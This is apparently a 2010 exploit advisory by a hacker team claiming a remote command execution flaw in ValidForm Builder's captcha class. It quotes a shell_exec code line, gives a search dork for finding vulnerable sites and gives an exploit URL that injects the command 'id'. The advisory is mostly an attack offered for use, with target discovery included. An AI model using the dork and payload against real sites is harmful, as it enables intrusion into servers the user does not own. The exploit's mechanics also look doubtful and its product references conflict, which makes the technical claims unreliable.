# Exploit Title:   ValidForm Builder script Remote Command Execution Vulnerability
# Date: 2010/07/23
# Author: HackeR aRaR
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script:
http://validformbuilder.googlecode.com/files/validformbuilder_v.1.0.zip
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
#ViRuS Qalaa:em9@live.com <Qalaa%3Aem9@live.com>
:::::::::::::::::::::::::
=================Exploit=================
 
-=[ vuln c0de ]=-
shell_exec("$this->sFlitePath -t \"$sText\" -o
$this->sAudioPath$sFile.wav");
/libraries/ValidForm/class.phpcaptcha.php
Line:466
 
----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"
 
http://{localhost}/{path}/libraries/ValidForm/class.phpcaptcha.php?this=id<http://%7blocalhost%7d/%7Bpath%7D/libraries/ValidForm/class.phpcaptcha.php?this=id>
 
---------greatz----------
Greatz to :
ViRuS Qalaa,VoLc4n0
 
and My friends Others and My friends in MSN
EnJoY o_O